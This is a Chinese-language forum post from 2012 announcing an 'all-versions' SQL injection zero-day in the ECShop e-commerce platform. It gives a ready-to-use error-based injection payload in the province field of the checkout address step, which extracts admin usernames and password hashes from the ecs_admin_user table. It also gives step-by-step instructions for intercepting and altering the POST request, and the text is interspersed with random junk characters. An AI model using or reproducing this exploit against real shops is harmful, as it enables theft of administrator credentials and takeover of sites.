标题: ECShop全版本SQL注入0day [打印本页] 作者: admin 时间: 2012-12-31 09:19 标题: ECShop全版本SQL注入0day 感谢欠杀的黑盒 ! e! \- ^6 W( n : C8 E# u9 ? h4 I8 G ; X: m4 I5 Y o Z/ ~, T
把任意商品加入购物车在填写配送地址那一页,有地区选择( O# R) i6 s% U
3 P% P; b0 i- Q4 \, l3 h4 W/ \: S) C& k
flow.php?step=consignee&direct_shopping=1( Z a% c$ Q1 a, J8 m' `+ Q
比如省选择安徽, `8 ~4 ^: y. r9 N) O. O$ Z. H/ m% x6 l, ]
3 \0 K# [: D! Z* [5 P& z其中POST数据如下 # m, a' ]3 f( I& R3 ?. Z0 b , h5 L6 V3 i& K% G
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3 8 W4 p$ o. Q, p; Y改成( u6 T" c% o. B5 M) h4 C
5 k0 n; E- C s9 A$ Bprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #3 o! l6 {- n9 U+ q9 ~% I+ i
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..' f8 I+ {* k% S9 e( n
" C: V: K J! j$ c
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包 5 V6 }6 k& b J3 ~! u$ \5 s+ V# e ! i- W% n# e; i% I就会回显错误页面了。。。。. L! l5 t7 u% @5 b* D
* v# s7 p/ g5 J# L. ~/ t' Q
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的! j. Z+ }) D4 k